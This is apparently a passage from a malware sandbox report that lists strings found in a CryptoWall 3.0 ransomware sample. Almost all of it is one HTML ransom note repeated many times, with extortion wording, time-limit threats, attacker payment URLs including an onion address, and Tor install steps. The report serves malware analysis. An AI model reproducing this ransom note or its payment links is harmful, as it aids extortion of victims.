these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt339.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt263.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html236.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html48.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt120.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html106.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt214.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt325.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt95.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt275.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html210.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html240.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html112.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html266.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt410.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt163.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html56.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html77.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt235.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html124.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html242.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html263.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" 